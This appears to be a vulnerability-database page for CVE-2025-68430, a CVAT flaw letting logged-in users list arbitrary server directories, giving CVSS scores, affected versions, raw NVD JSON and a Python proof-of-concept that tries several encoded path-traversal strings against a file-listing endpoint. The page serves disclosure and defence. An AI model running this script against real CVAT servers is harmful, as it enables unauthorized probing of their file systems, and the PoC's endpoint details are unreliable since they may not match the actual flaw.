Security Vulnerability Report
中文
CVE-2025-68430 CVSS 4.3 MEDIUM

CVE-2025-68430

Published: 2025-12-19 18:15:51
Last Modified: 2026-01-13 15:20:10
Source: [email protected]

Description

CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.8.1 through 2.52.0, an attacker with an account on a CVAT instance is able to retrieve the contents of any file system directory accessible to the CVAT server. The exposed information is names of contained files and subdirectories. The contents of files are not accessible. Version 2.53.0 contains a patch. No known workarounds are available.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:* - VULNERABLE
CVAT 2.8.1
CVAT 2.9.0
CVAT 2.10.0
CVAT 2.11.0
CVAT 2.12.0
CVAT 2.13.0
CVAT 2.14.0
CVAT 2.15.0
CVAT 2.16.0
CVAT 2.17.0
CVAT 2.18.0
CVAT 2.19.0
CVAT 2.20.0
CVAT 2.21.0
CVAT 2.22.0
CVAT 2.23.0
CVAT 2.24.0
CVAT 2.25.0
CVAT 2.26.0
CVAT 2.27.0
CVAT 2.28.0
CVAT 2.29.0
CVAT 2.30.0
CVAT 2.31.0
CVAT 2.32.0
CVAT 2.33.0
CVAT 2.34.0
CVAT 2.35.0
CVAT 2.36.0
CVAT 2.37.0
CVAT 2.38.0
CVAT 2.39.0
CVAT 2.40.0
CVAT 2.41.0
CVAT 2.42.0
CVAT 2.43.0
CVAT 2.44.0
CVAT 2.45.0
CVAT 2.46.0
CVAT 2.47.0
CVAT 2.48.0
CVAT 2.49.0
CVAT 2.50.0
CVAT 2.51.0
CVAT 2.52.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68430 PoC - CVAT Directory Traversal Information Disclosure # Target: CVAT instances versions 2.8.1 to 2.52.0 # Author: Security Research # Reference: https://github.com/cvat-ai/cvat/security/advisories/GHSA-3g7v-xjh7-xmqx def exploit_cvat_directory_traversal(base_url, username, password, target_path): """ Exploit for CVAT directory traversal vulnerability (CVE-2025-68430) This PoC demonstrates how an authenticated attacker can list arbitrary directories. Args: base_url: CVAT instance base URL (e.g., 'https://cvat.example.com') username: Valid CVAT account username password: CVAT account password target_path: Path to enumerate (e.g., '../../etc/', '/var/log/') Returns: List of files and directories if exploitation succeeds """ session = requests.Session() # Step 1: Authenticate with CVAT login_url = f"{base_url}/api/auth/login" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, json=login_data, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed: HTTP {response.status_code}") return None print("[+] Authentication successful") except requests.RequestException as e: print(f"[-] Connection error: {e}") return None # Step 2: Exploit directory traversal via file listing endpoint # The vulnerable endpoint allows path traversal in the 'path' parameter files_url = f"{base_url}/api/v1/files" # Try different path traversal techniques traversal_paths = [ target_path, f"..{target_path}", f"../{target_path}", f"..%2f{target_path}", f"..%252f{target_path}" ] results = [] for path in traversal_paths: try: params = {'path': path} response = session.get(files_url, params=params, timeout=10) if response.status_code == 200: data = response.json() if data and 'files' in data: print(f"[+] Successfully retrieved directory listing for: {path}") print(f"[+] Found {len(data['files'])} items:") for item in data['files']: item_type = 'DIR' if item.get('type') == 'DIR' else 'FILE' print(f" [{item_type}] {item.get('name', 'unknown')}") results.extend(data['files']) except Exception as e: print(f"[-] Error with path {path}: {e}") return results def main(): if len(sys.argv) < 5: print("Usage: python cve_2025_68430.py <base_url> <username> <password> <target_path>") print("Example: python cve_2025_68430.py https://cvat.example.com admin password \"../../etc/\"") sys.exit(1) base_url = sys.argv[1].rstrip('/') username = sys.argv[2] password = sys.argv[3] target_path = sys.argv[4] print(f"[*] CVE-2025-68430 CVAT Directory Traversal PoC") print(f"[*] Target: {base_url}") print(f"[*] Target path: {target_path}") print("-" * 50) results = exploit_cvat_directory_traversal(base_url, username, password, target_path) if results: print(f"\n[+] Exploitation successful! Retrieved {len(results)} items.") else: print("\n[-] Exploitation failed or target not vulnerable.") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68430", "sourceIdentifier": "[email protected]", "published": "2025-12-19T18:15:51.310", "lastModified": "2026-01-13T15:20:10.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.8.1 through 2.52.0, an attacker with an account on a CVAT instance is able to retrieve the contents of any file system directory accessible to the CVAT server. The exposed information is names of contained files and subdirectories. The contents of files are not accessible. Version 2.53.0 contains a patch. No known workarounds are available."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.8.1", "versionEndExcluding": "2.53.0", "matchCriteriaId": "BFD53BFE-4EC8-4EE6-93E2-7A9506655686"}]}]}], "references": [{"url": "https://github.com/cvat-ai/cvat/commit/2c24ef0c3f8fd94f6c71cff4eafcf11bfcaa5f91", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cvat-ai/cvat/security/advisories/GHSA-3g7v-xjh7-xmqx", "source": "[email protected]", "tags": ["Third Party Advisory", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.